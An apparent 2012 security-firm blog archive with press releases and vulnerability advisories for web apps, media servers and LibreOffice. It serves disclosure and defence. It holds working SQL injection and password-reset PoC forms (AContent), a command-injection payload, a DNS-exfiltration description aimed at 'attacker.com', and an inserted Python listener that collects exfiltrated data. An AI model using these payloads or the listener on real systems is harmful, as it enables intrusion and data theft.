Saturday, December 29, 2012

High-Tech Bridge to Partner with Open Security Foundation

High-Tech Bridge is pleased to announce its partnership with the Open Security Foundation (OSF) and, in particular, with its Open Source Vulnerability Database (OSVDB).

Ilia Kolochenko, CEO of High-Tech Bridge, says, "At High-Tech Bridge, we are pleased to welcome the founders of OSF, Jake Kouns and Brian Martin to our Advisory Board. Their unique experience and competence in vulnerability research and management will be extremely useful in advising our company. Strong technical collaboration between High-Tech Bridge Research Lab, which has obtained both CVE and CWE Compatible statuses this year, and OSVDB shall be fruitful for both the information security and vulnerability research communities. In the near future we are also planning to collaborate in the domain of vulnerability research leveraging our new SaaS ImmuniWeb®, to be launched on the 15th of January 2013 in a Beta mode."

Brian Martin, President and COO of Open Security Foundation, adds, "High-Tech Bridge has shown serious dedication to providing pro bono vulnerability research for hundreds of software vendors, as well as constantly enhancing their vulnerability research and disclosure process. This drive for maintaining high standards is exactly what the OSF looks for in the industry."

About High-Tech Bridge

High-Tech Bridge SA provides companies and international organizations with cutting-edge information security services, such as penetration testing and computer crime investigations. High-Tech Bridge was recognized as one of the market leaders and best service providers in the ethical hacking industry according to Frost & Sullivan's market research conducted in 2012.

About Open Security Foundation

Open Security Foundation (OSF) is a 501(c)(3) non-profit public organization founded and operated by information security enthusiasts. Open Security Foundation provides independent, accurate, detailed, current, and unbiased security information. Open Security Foundation runs the Open Source Vulnerability Database (OSVDB), the DataLossDB, and other projects. OSVDB currently covers over 87,000 vulnerabilities, spanning over 59,000 products.

Contact
Mr. Sebastien Flaccavento
Tel.: +41-22-560-68-43
E-Mail: press (at) htbridge.com

Monday, December 24, 2012

HTB23133: Elite Bulletin Board multiple SQL injection vulnerabilities

High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in Elite Bulletin Board 2.1.21.

The vulnerabilities exist due to insufficient sanitisation of user-supplied data taken from the request URI in the "update_whosonline_reg()" and "update_whosonline_guest()" functions within the "/includes/user_function.php" script. Many scripts of the application are exposed to this attack. More information: High-Tech Bridge Advisory HTB23133 - Multiple SQL Injection Vulnerabilities in Elite Bulletin Board.

Upgrade to Elite Bulletin Board v2.1.22 to fix these issues.

HTB23129: FireFly Media Server Multiple Remote DoS Vulnerabilities

Multiple security vulnerabilities (HTB23129) were found in FireFly Media Server version 1.0.0.1359.

Multiple NULL pointer dereference vulnerabilities in FireFly Media Server

One vulnerability exists due to improper handling of the HTTP "Connection" header within the "firefly.exe" binary. A remote attacker can send a specially crafted request to port 9999/TCP (FireFly's default server port) with an improper "Connection" header value, leading to a NULL pointer dereference that crashes the vulnerable server immediately.

Another vulnerability exists due to improper handling of the "Accept-Language", "User-Agent" and "Host" HTTP headers within the "firefly.exe" binary. A remote attacker can send a specially crafted request to port 9999/TCP with a malformed header containing a carriage return / line feed sequence ("\r\n"), which causes a NULL pointer dereference and immediate termination of the vulnerable server.

A third vulnerability exists due to improper handling of the HTTP POST and GET methods within the "firefly.exe" binary. A remote attacker can send a specially crafted request to port 9999/TCP with an improper HTTP POST or GET request containing an erroneous HTTP protocol version, or one or more carriage return / line feed sequences ("\r\n"), leading to a NULL pointer dereference that crashes the vulnerable server immediately.

Source: High-Tech Bridge Advisory HTB23129 - FireFly Media Server Multiple Remote DoS vulnerabilities.

Thursday, December 20, 2012

HTB23118: Banana Dance multiple vulnerabilities

Banana Dance versions B.2.6 and probably prior suffer from PHP file inclusion, improper access control and SQL injection vulnerabilities, according to High-Tech Bridge Advisory HTB23118 - Multiple vulnerabilities in Banana Dance.

  • PHP File Inclusion in Banana Dance:
    Input passed via the "name" POST parameter to "/functions/ajax.php" is not properly verified before being used in the "include_once()" function. This can be exploited to include arbitrary local files via directory traversal sequences and URL-encoded NULL bytes.

  • Improper Access Control in Banana Dance:
    The application does not restrict access to the "/functions/suggest.php" script, so it can be reached without authentication. A remote attacker can read arbitrary information from the database.

  • SQL Injection in Banana Dance:
    Input passed via the "return", "display", "table" and "search" POST parameters to the "/functions/suggest.php" script is not properly sanitised before being used in an SQL query. Although "mysql_real_escape_string()" is called on the input, it has no effect because the values are placed inside backtick (`) quotes, i.e. used as identifiers rather than string literals, and mysql_real_escape_string() does not escape backticks. Input passed via the "id" GET parameter to "functions/widgets.php", the "category" GET parameter to "functions/print.php" and the "name" GET parameter to "functions/ajax.php" is likewise not properly sanitised before being used in SQL queries. These vulnerabilities can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
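The backtick problem described above, as an added example written in Python rather than the project's PHP (this is not Banana Dance's code; the table names, the column name and the query shape are hypothetical). It models the escaping set of PHP's mysql_real_escape_string(), shows that a value landing between backticks breaks out of the identifier untouched, and shows the allowlist-plus-parameters form that closes both the identifier and the string-literal context:

```python
# Added example (not Banana Dance's code): why mysql_real_escape_string()
# does not help once the value is used inside backtick-quoted identifiers,
# and the allowlist check that does. Table/column names are hypothetical.

# Characters PHP's mysql_real_escape_string() escapes: NUL, \n, \r, \, ', " and Ctrl-Z.
_ESCAPES = {"\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
            "'": "\\'", '"': '\\"', "\x1a": "\\Z"}


def mysql_real_escape_string(value: str) -> str:
    """Same escaping set as the PHP function; note the backtick is not in it."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_query_escaped(table: str, search: str) -> str:
    """The vulnerable pattern: escaping is applied, but `table` lands between
    backticks (an identifier), where a backtick in the input closes the quote."""
    return "SELECT * FROM `%s` WHERE `name` LIKE '%%%s%%'" % (
        mysql_real_escape_string(table), mysql_real_escape_string(search))


ALLOWED_TABLES = frozenset({"pages", "categories", "users"})  # hypothetical


def build_query_allowlisted(table: str, search: str):
    """Hardened form: identifiers come from a fixed allowlist, values are bound
    as parameters (the driver quotes them), so neither context is injectable.
    Returns (sql, params) ready for cursor.execute(sql, params)."""
    if table not in ALLOWED_TABLES:
        raise ValueError("unknown table: %r" % table)
    sql = "SELECT * FROM `%s` WHERE `name` LIKE %%s" % table
    return sql, ("%" + search + "%",)
```

With the constructed table value `pages` WHERE 1=1 -- ` the escaped query reads SELECT * FROM `pages` WHERE 1=1 -- ` WHERE `name` LIKE '%x%': the injected WHERE clause is live and the original filter is commented out, while the same function does correctly escape a single quote inside the string-literal search value. Escaping is context-specific; identifiers must be validated against a list, not escaped.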

Banana Dance is a free, open source, PHP/MySQL program that takes the best of wiki software and combines it with the best of web content management systems (CMS).

In-Memory Fuzzing with Java

A new security publication by Xavier Roussel, Junior Security Analyst at High-Tech Bridge, is available: In-Memory Fuzzing with Java.

Direct link to download the PDF: In-Memory Fuzzing in Java (1.0 MB).

Web Applications Vulnerabilities CVSSv2 Calculator

High-Tech Bridge is pleased to announce a CVSSv2 calculator for vulnerabilities in web applications.

The Common Vulnerability Scoring System (CVSS) provides an open framework for communicating the characteristics and impacts of IT vulnerabilities.

Read more: A Complete Guide to the Common Vulnerability Scoring System Version 2.0.

High-Tech Bridge to Announce ImmuniWeb® for its Fifth Anniversary

High-Tech Bridge is pleased to celebrate its fifth anniversary on December 12, 2012. We are grateful to all our customers for their loyalty and trust. On this remarkable date, High-Tech Bridge is also proud to partially unveil its innovative in-house product, ImmuniWeb®, which many customers, partners and journalists have been expecting for almost a year.

Ilia Kolochenko, CEO, comments:

"Our fifth year of continuous growth proves that we are doing the right thing and our business strategy is correct. Finally, we are ready to launch ImmuniWeb®, a product that is aimed to change our market towards simplicity, integrity and accessibility for Small and Medium Businesses, who were unfairly prevented from testing their security by high market prices and administrative difficulties. We have invested several million dollars and almost 3 years into its development, and now we are ready to present it to the public. The official sales of ImmuniWeb® Beta will start on the 15th of January 2013 for all the customers in Switzerland, and for the holders of invite-codes abroad. Later the product will be available worldwide without limitations. We have already registered the trademark in 36 countries. For the moment that's all I can say about ImmuniWeb®, more information is coming soon. Stay with us."

High-Tech Bridge will offer special discounts on ImmuniWeb® to all its customers. If you are located abroad, please contact your High-Tech Bridge Account Manager by e-mail to get an invite code.

About High-Tech Bridge
High-Tech Bridge SA provides multinational companies, financial institutions and international organizations with cutting-edge information security, penetration testing and ethical hacking services. In 2012, Frost & Sullivan's market research recognized High-Tech Bridge as one of the market leaders and best service providers in the ethical hacking industry.

Contacts
Mr. Sebastien Flaccavento
Tel.: +41-22-560-68-43
E-Mail: press@htbridge.com

Web: https://www.htbridge.com

Twitter: https://twitter.com/htbridge

Facebook: https://www.facebook.com/htbridge

HTB23127: Multiple Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF)

Smartphone Pentest Framework (SPF) versions 0.1.3 and 0.1.4 suffer from OS Command Injection [CWE-78]. High-Tech Bridge Security Research Lab discovered multiple OS command execution vulnerabilities in Smartphone Pentest Framework (SPF), which could be exploited to take control of a penetration tester's machine remotely.

According to High-Tech Bridge's Advisory HTB23127, multiple Perl scripts in the "/frameworkgui/" directory pass user-supplied input to the "system()" function without sanitisation, so that it is possible to inject and execute arbitrary OS commands on the target system with the privileges of the web server user.

Because the CSRF vulnerability (3) reported in HTB23123 remains unfixed, these issues can also be exploited through a CSRF vector. The affected scripts are "SEAttack.pl" (insufficient validation of user-supplied input passed via the "hostingPath" parameter), "CSAttack.pl" (the "hostingPath" parameter) and "attachMobileModem.pl" (the "appURLPath" parameter).

These vulnerabilities are unpatched at this time; as a temporary solution, remove or disable SPF's web GUI.

Full advisory: High-Tech Bridge Advisory HTB23127 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).

Friday, December 7, 2012

HTB23120: TVMOBiLi Media Server remote DoS vulnerabilities

High-Tech Bridge Security Research Lab has discovered two remote DoS vulnerabilities in TVMOBiLi Media Server, which could be exploited to crash the remote server with malicious HTTP requests.

The root cause is improper handling of a length parameter inconsistency [CWE-130].

Brief description of the vulnerabilities:
The vulnerabilities exist due to improper handling of the URI length within the "HttpUtils.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP GET request of 161, 257 or 255 characters, or of 255, 257 or 260 characters (one set of lengths per vulnerability), to port 30888/TCP (TVMOBiLi's default server port) and cause a stack-based buffer overrun that crashes the tvMobiliService service.

TVMOBiLi is a free media server for Mac, Windows and Linux that enables your computer to communicate with a myriad of modern devices in your home using UPnP.

Solution:
The vulnerabilities are fixed in TVMOBiLi 2.1.0.3974.

References:

  1. High-Tech Bridge Advisory HTB23120: TvMobili Media Server Multiple Remote DoS Vulnerabilities
  2. TVMOBiLi - a free Media server for Mac, Windows, and Linux

HTB23125: ClipBucket SQL injection vulnerabilities

Multiple SQL injection vulnerabilities were found in ClipBucket, a free and open-source video sharing script. Full details of the vulnerabilities with Proof-of-Concept examples are available on High-Tech Bridge Security Research Lab's page: High-Tech Bridge Advisory HTB23125: Multiple SQL Injection vulnerabilities in ClipBucket.

List of vulnerable scripts: "ajax.php", "/user_contacts.php", "/view_channel.php", "view_page.php", "view_topic.php", "/watch_video.php".

As noted on the researcher's page, some of these vulnerabilities were described earlier for previous versions of ClipBucket; however, they were not fixed in the tested version (2.6 Revision 738).

A solution is now available: apply the CB SQL Injection Fix 11282012 patch or upgrade to ClipBucket 2.6 r738 with security fixes (clipbucket-2.6-r738-security-fixed-p2). These files are available in the download area of ClipBucket's SourceForge page.

HTB23126: Achievo SQL injection, cross-site scripting (XSS) vulnerabilities

Multiple security vulnerabilities (HTB23126) were found in Achievo version 1.4.5.

  • SQL Injection vulnerability in Achievo:
    The vulnerability was discovered in the "dispatch.php" script while handling the "activityid" HTTP GET parameter. A remote authenticated attacker can inject and execute arbitrary SQL commands in the application's database. Successful exploitation requires that the attacker is logged in to the application (registration is closed by default).
  • Cross-Site Scripting (XSS) vulnerability in Achievo:
    An input sanitisation error was found in the "include.php" script when handling the "field" HTTP GET parameter. A remote attacker can execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website.

Achievo is a flexible web-based resource management tool suitable for any medium-sized company that needs to keep track of its resources, projects, clients, contacts, planning and daily scheduling.

References:

  1. Achievo.org - Project Management Software
  2. High-Tech Bridge Advisory HTB23126: Multiple vulnerabilities in Achievo

Friday, November 30, 2012

More photos of High-Tech Bridge's office: our racks

Following the previous post, High-Tech Bridge office photos, more pictures are now available.

All other photos and events can be seen here: High-Tech Bridge on Facebook.

Online Trust Alliance (OTA) Gold Sponsor

Not long ago, High-Tech Bridge joined the Online Trust Alliance (OTA) as a Gold Sponsor and Advisory Council member. Alongside High-Tech Bridge, the list includes organizations such as AllClear ID, Epsilon, Internet Identity, LashBack, Microsoft, Pitney Bowes, PricewaterhouseCoopers, Secunia and Verisign.
The whole list: OTA Gold Sponsors - Advisory Council.

Friday, November 23, 2012

HTB23123: Smartphone Pentest Framework (SPF) multiple vulnerabilities

Smartphone Pentest Framework (SPF) version 0.1.2 suffers from five different types of software weakness: OS Command Injection [CWE-78], SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352], Improper Access Control [CWE-284] and Incorrect Default Permissions [CWE-276]. High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in the Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to take control of a pentester's machine.

  • Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF):
    Multiple Perl scripts in the "/frameworkgui/" directory pass user-supplied input to the system() function without sanitisation. This could be exploited to inject and execute arbitrary OS commands on the target system with the privileges of the web server.

  • SQL Injection [CWE-89]:
    Multiple Perl scripts in the "/frameworkgui/" directory are vulnerable to SQL injection. A remote attacker can execute arbitrary SQL commands in the application's database.

  • Cross-Site Request Forgery [CWE-352]:
    The vulnerability exists due to insufficient verification of the origin of HTTP requests in all Perl scripts within the "/frameworkgui/" directory. A remote attacker without direct access to the application's web interface can perform cross-site request forgery attacks and execute arbitrary actions available only to the application's users (e.g. send SMS messages).

  • Improper Access Control [CWE-284]:
    The weakness exists due to an insufficient ACL on the "config" file located in the "/frameworkgui/" directory. A remote attacker can access the configuration file directly and obtain sensitive information, such as the database password, which is stored in plaintext.

  • Incorrect Default Permissions [CWE-276]:
    The weakness exists because the "btinstall" installation script sets world-writable permissions on all files within the "/frameworkgui/" directory:
    cd /var/www/frameworkgui; chmod 777 * ;
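The system() pattern behind the OS command execution item above and behind HTB23127 (higher up on this page), rendered in Python as an added example that is not SPF's code. SPF's Perl scripts hand a request parameter such as "hostingPath" to system(); the equivalent below is subprocess with shell=True. The function names, the directory-listing command and the constructed payload are hypothetical stand-ins, and the hardened form shows both the no-shell argv call and the allowlist validation a GUI handler should apply first:

```python
# Added example (not SPF's code): the HTB23123/HTB23127 pattern in Python terms.
# Function names, the "ls -d" command and the payload are hypothetical stand-ins.
import re
import subprocess

# Constructed payload: a path that also carries a second shell command.
INJECTED_HOSTING_PATH = "/tmp; echo INJECTED"


def list_hosting_path_unsafe(hosting_path: str) -> str:
    """Vulnerable: the value is spliced into a command line that /bin/sh parses,
    so ';', '|', '$(...)' and friends inside it become commands (SPF's system())."""
    done = subprocess.run("ls -d " + hosting_path, shell=True,
                          capture_output=True, text=True)
    return done.stdout


def list_hosting_path_safe(hosting_path: str) -> subprocess.CompletedProcess:
    """Hardened: argv form, no shell; the whole value is exactly one argument."""
    return subprocess.run(["ls", "-d", hosting_path], capture_output=True, text=True)


# Defence in depth: accept only what a hosting path can legitimately look like
# (absolute, plain path characters, no '..' component). Assumed policy.
_SAFE_PATH = re.compile(r"^/(?:[A-Za-z0-9_.-]+/)*[A-Za-z0-9_.-]*$")


def is_valid_hosting_path(hosting_path: str) -> bool:
    return bool(_SAFE_PATH.match(hosting_path)) and ".." not in hosting_path.split("/")


def list_hosting_path(hosting_path: str) -> str:
    """What the GUI handler should do: validate, then run without a shell."""
    if not is_valid_hosting_path(hosting_path):
        raise ValueError("rejected hostingPath: %r" % hosting_path)
    return list_hosting_path_safe(hosting_path).stdout
```

With the constructed payload, the shell form runs both commands and INJECTED appears in the output; the argv form passes the whole string to ls as one (non-existent) file name and nothing else executes. Perl's own equivalent of the argv form is the list form of system(), system("ls", "-d", $path), which likewise bypasses the shell.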

Solution available:
Upgrade to Smartphone Pentest Framework (SPF) version 0.1.3. Note that HTB23127 (above) reports further OS command injection issues in versions 0.1.3 and 0.1.4, so the upgrade does not close the command injection vector on its own.

Original HTB Advisory:
HTB23123: Multiple Vulnerabilities in Smartphone Pentest Framework (SPF)

Thursday, November 22, 2012

HTB23124: dotProject multiple vulnerabilities

dotProject 2.1.6, an open source web-based project management application, suffers from SQL injection and cross-site scripting (XSS) vulnerabilities, discovered by High-Tech Bridge Security Research Lab.

  • SQL Injection in dotProject:
    The vulnerabilities exist due to insufficient sanitisation of input passed via the "search_string", "where", "dept_id", "project_id" and "company_id" HTTP GET parameters to the "index.php" script. These vulnerabilities could also be exploited by a remote non-authenticated attacker via a CSRF vector.

  • Cross-Site Scripting (XSS) in dotProject:
    Input sanitisation errors were found in the "index.php" script when handling the "callback", "field", "company_name" and "date" HTTP GET parameters.

The vulnerabilities are rated medium risk.

Solution: Upgrade your dotProject installation to version 2.1.7.

Original advisory: HTB23124: Multiple vulnerabilities in dotProject.

Friday, November 16, 2012

HTB23122: BabyGekko multiple vulnerabilities

BabyGekko CMS v1.2.2e suffers from SQL injection, PHP file inclusion and cross-site scripting vulnerabilities.

  • SQL Injections in Baby Gekko:
    The vulnerability exists due to insufficient validation of input passed via the "keyword" and "query" parameters to the "admin/index.php" script. In the first case the "app" parameter must be set to "users". These vulnerabilities can be exploited by a non-authenticated malicious user via a CSRF vector.

  • Local File Inclusion
    The vulnerability exists due to insufficient validation of input passed via the "app" parameter to the "index.php" script. A remote attacker can include arbitrary files from the local system using directory traversal sequences with a NULL byte.

  • Cross-site scripting (XSS)
    Input passed via the "id" parameter to "/admin/index.php" and via the "username" and "password" HTTP POST parameters to "index.php" is not properly sanitised. This can be used to inject and execute arbitrary HTML and script code in a user's browser in the context of the vulnerable website.

These vulnerabilities are fixed in BabyGekko 1.2.2f.

More information about these issues, with PoCs and an attack scenario, can be found on this page: High-Tech Bridge Advisory HTB23122 - Multiple vulnerabilities in BabyGekko.

Friday, November 9, 2012

High-Tech Bridge Continues Expansion and Prepares Innovative Product Announcement Shortly

High-Tech Bridge is pleased to announce a share capital increase to CHF 4M. The new funding will mainly be used to finish the development of an innovative in-house security product, which will be announced in the near future. At the moment the product is in its pre-final internal testing phase.

Ilia Kolochenko, CEO, summarizes the corporate course of 2012: "At High-Tech Bridge, 2012 was a year of several significant achievements. First of all, our organic growth, stable development and permanent internal perfection processes were recognized by Frost & Sullivan, who nominated High-Tech Bridge as one of the market leaders and best service providers in the ethical hacking industry in April.

Secondly, in June High-Tech Bridge has been named to the Online Trust Alliance (OTA) 2012 Online Trust Honor Roll. Designed to recognize leadership, the Honor Roll distinguishes High-Tech Bridge as a "North Star" to inspire others.

Thirdly, our proprietary Security Research Lab has successfully obtained both CVE® and CWE® compatibility status that assures the highest quality of our research. We were investing and we will continue investing into Research and Development, as we consider innovation as one of the most important factors to assure the best quality of service for our customers.

We also managed to reinforce considerably our technical team with new experts. Therefore in August we doubled our office space and we expect to increase it even more before the end of the year, staying at World Trade Center Geneva. In October we have successfully passed our yearly ISO 27001 audit by SGS.

High-Tech Bridge's main priority is customer satisfaction. We thank all our customers for loyalty and trust, and we will do our best to continue delivering cutting-edge ethical hacking and computer forensics services in the future. Our new product, that is currently being tested, is also aimed to deliver the highest level of satisfaction to the customers of its niche."

We remind you that during this week High-Tech Bridge's team will be pleased to meet you at Gartner's Symposium ITxpo 2012 in Barcelona, where High-Tech Bridge is a speaker and exhibitor. We also look forward to seeing you at ISACA's "Information Security Day" in February 2013 in Luxembourg, where High-Tech Bridge is a Gold Sponsor and speaker for two security talks.

Contact
Sebastien Flaccavento
Senior Project Manager

High-Tech Bridge SA
Public and Press Relations
+41-22-560-68-43
E-mail: press (at) htbridge.com
https://www.htbridge.com

Source: High-Tech Bridge continues expansion and prepares innovative product announcement shortly.

Wednesday, November 7, 2012

HTB23121: CMS Made Simple cross-site request forgery (CSRF) vulnerability

CMS Made Simple (version 1.11.2), an open source CMS, contains a vulnerability which can be exploited to perform cross-site request forgery (CSRF) attacks.

The application allows an authorised administrator to perform certain actions via HTTP requests without proper validity checks to verify the source of the requests. This can be exploited to delete arbitrary files and directories. To exploit this vulnerability, an attacker must make a logged-in administrator open a malicious link in the browser.

The PoC (Proof of Concept) code in the advisory deletes the root directory with all its files, completely destroying the CMS installation (when additional conditions are satisfied).

The vulnerability has been fixed; upgrade to CMSMS 1.11.2.1.

High-Tech Bridge Advisory HTB23121 - Cross-Site Request Forgery (CSRF) in CMS Made Simple.

HTB23119: SQL Injection vulnerabilities in OrangeHRM

OrangeHRM version 2.7.1-rc.1 and probably prior contain SQL Injection [CWE-89] vulnerabilities, reported by High-Tech Bridge Security Research Lab.

The vulnerabilities were discovered in the "symfony/web/index.php" script while handling the "sortField" HTTP GET parameter. Successful exploitation requires administrative privileges; however, the issue can be exploited by a non-authenticated user via a CSRF vector, as the above-mentioned script is also vulnerable to CSRF. The vulnerability can be triggered by accessing the following URIs:
/symfony/web/index.php/admin/viewCustomers
/symfony/web/index.php/admin/viewPayGrades

The PoCs in the advisory use a DNS exfiltration technique and work when the application's database is hosted on a Windows system: they make the database server issue a DNS request for a subdomain of ".attacker.com" (a domain whose authoritative DNS server the attacker controls) whose leftmost labels are the output of `version()` or any other value read from the database, so the data leaves the network inside the name being resolved.
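The receiving side of that technique, as an added example that is not High-Tech Bridge's PoC: a listener for the attacker-controlled zone that parses the question section of each incoming DNS query and recovers whatever the database server was made to resolve. On Windows-hosted MySQL the lookup is typically provoked through a UNC path (\\<data>.attacker.com\share) handed to LOAD_FILE(), which is why the advisory restricts the PoCs to Windows; that mechanism is general knowledge, not something this page states. The zone name, the constructed query packet and the label handling are this example's assumptions:

```python
# Added example (not High-Tech Bridge's PoC): the listener side of DNS
# exfiltration. Parses the question section of a DNS query and strips the
# attacker's zone, leaving the exfiltrated data. Zone and packet are assumed.
import socket
import struct

EXFIL_ZONE = "attacker.com"  # assumed: a zone whose authoritative server is ours


def build_query(name: str, txid: int = 0x1234, qtype: int = 1) -> bytes:
    """Constructed sample: a minimal DNS query for `name` (QTYPE A, QCLASS IN),
    shaped like the one a resolver sends when the database server looks it up."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, 1 question
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)


def parse_question(packet: bytes):
    """Return (qname, qtype) from a DNS query; rejects malformed packets."""
    if len(packet) < 12:
        raise ValueError("short DNS header")
    _txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    pos, labels = 12, []
    while True:
        if pos >= len(packet):
            raise ValueError("truncated QNAME")
        length = packet[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question")   # never valid here
        if length > 63 or pos + length > len(packet):
            raise ValueError("bad label length")
        labels.append(packet[pos:pos + length].decode("ascii", "replace"))
        pos += length
    if pos + 4 > len(packet):
        raise ValueError("truncated QTYPE/QCLASS")
    qtype, = struct.unpack("!H", packet[pos:pos + 2])
    return ".".join(labels), qtype


def extract_exfil(qname: str, zone: str = EXFIL_ZONE):
    """Strip the zone suffix; what is left is attacker-chosen data (for example
    the output of version()). Returns None for lookups outside the zone."""
    suffix = "." + zone.lower()
    if not qname.lower().endswith(suffix):
        return None
    return qname[:-len(suffix)]


def listen(bind_addr: str = "0.0.0.0", port: int = 53):
    """Print exfiltrated values as they arrive (binding port 53 needs privileges)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind_addr, port))
        while True:
            packet, peer = sock.recvfrom(512)
            try:
                qname, _ = parse_question(packet)
            except ValueError:
                continue
            data = extract_exfil(qname)
            if data is not None:
                print("%s leaked: %s" % (peer[0], data))
```

Two practical caveats: a DNS label is at most 63 bytes and a name at most 253, so anything longer than a version string has to be hex-encoded and chunked across several lookups by the injected query; and dots in the exfiltrated value (5.5.28-log) arrive as separate labels, which is why the parser joins the labels back with dots before stripping the zone.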

All details and Proof of Concept (PoC) examples are available on the page below:
High-Tech Bridge Advisory HTB23119 - SQL Injection Vulnerability in Orange HRM.

HTB23106: Multiple DoS vulnerabilities in LibreOffice

LibreOffice Suite version 3.5.5.3 is affected by multiple Denial of Service (DoS) vulnerabilities.

Advisory ID: HTB23106
Product: LibreOffice Suite
Vendor: LibreOffice
Tested / Vulnerable Versions: 3.5.5.3 / 3.5.5.3 and probably prior
Vendor Notification / Patch / Public Disclosure dates: July 26 / October 18 / October 31, 2012
Vulnerability Type: NULL Pointer Dereference [CWE-476]
CVE Reference: CVE-2012-4233
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
Solution Status: Fixed by Vendor
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab

Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in LibreOffice which could be exploited to perform denial of service (DoS) attacks.

Multiple vulnerabilities in LibreOffice:

  1. A NULL pointer dereference error was found in vcllo.dll while processing .odt files. A remote attacker can create a specially crafted .odt file, trick a user into opening that file and terminate the application.

  2. A NULL pointer dereference error was found in svxcorelo.dll while processing ODG (Drawing document) files. A remote attacker can create a specially crafted ODG file, trick a user into opening that file and terminate the application.

  3. A NULL pointer dereference error was found in tllo.dll when handling the PolyPolygon record within an embedded .wmf file in Microsoft PowerPoint 2003 (PPT) files. A remote attacker can create a specially crafted .ppt file, trick a user into opening that file and terminate the application.

  4. A NULL pointer dereference error was found in scfiltlo.dll while processing Microsoft Excel 2003 (XLS) files. A remote attacker can create a specially crafted XLS file, trick a user into opening that file and terminate the application.

Proof of Concept (PoC) examples are available in the original advisory; see the link below.

Attack vectors

These vulnerabilities require that a user opens a specially crafted file with an affected version of LibreOffice Suite. An attacker could use several ways to deliver a malicious file to the system.

In a web-based scenario, an attacker could host a file on a website or WebDAV share and trick a user into downloading and opening this file.

In an e-mail scenario, an attacker could exploit these vulnerabilities by sending an e-mail with a malicious file attached.

Solution:

Upgrade to LibreOffice 3.5.7.2.
More Information:
http://www.libreoffice.org/advisories/cve-2012-4233/

The source advisory, High-Tech Bridge Advisory HTB23106 - Denial of Service Vulnerability in LibreOffice, contains all technical details and descriptions of the vulnerabilities.

Thursday, November 1, 2012

ISACA's Information Security Day: High-Tech Bridge as Gold Sponsor and Speaker

High-Tech Bridge, an information security company, is a Gold Sponsor and speaker at the "Information Security Day" organised by ISACA®.

The event will take place on 6-7 February 2013 in Luxembourg.

Thursday, October 25, 2012

HTB23117: AContent multiple vulnerabilities

Multiple security vulnerabilities were discovered by High-Tech Bridge Security Research Lab in AContent version 1.2.

Advisory ID: HTB23117
Product: AContent
Vendor: ATutor
Vulnerable Version(s): 1.2 and probably prior
Tested Version: 1.2
Vendor Notification: September 26, 2012 
Public Disclosure: October 17, 2012 
Vulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Cross-Site Scripting [CWE-79]
CVE References: CVE-2012-5167, CVE-2012-5168, CVE-2012-5169
CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Risk Level: High 
Discovered and Provided: High-Tech Bridge Security Research Lab (https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in AContent, which can be exploited to bypass authentication and to perform Cross-Site Scripting (XSS) and SQL Injection attacks.

1) SQL Injection in AContent: CVE-2012-5167

1.1 The vulnerability exists due to insufficient sanitisation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in the application's database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.2 The vulnerability exists due to insufficient sanitisation of input data in the "field" HTTP POST parameter in /user/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in the application's database.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password=((select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))))-1" />
<input type="hidden" name="value" value="1" />
<input type="submit" id="btn">
</form>

1.3 Input passed via the "id" GET parameter to /user/user_password.php (in a POST request) is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The following PoC (Proof of Concept) demonstrates the vulnerability:

<form action="http://[host]/user/user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">
<input type="hidden" name="submit" value="1" />
<input type="submit" id="btn">
</form>

Successful exploitation of vulnerability 1.3 requires the attacker to be registered and logged in.

2) Improper Authentication in AContent: CVE-2012-5168

2.1 The vulnerability exists due to absent authentication in the "/user/index_inline_editor_submit.php" script. A remote unauthenticated attacker can change users' passwords.

The following example will change the password of the user with id=1 to 'password' (the submitted value is the SHA-1 hash of 'password'):

<form action="http://[host]/user/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="password-1" />
<input type="hidden" name="value" value="5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8" />
<input type="submit" id="btn">
</form>

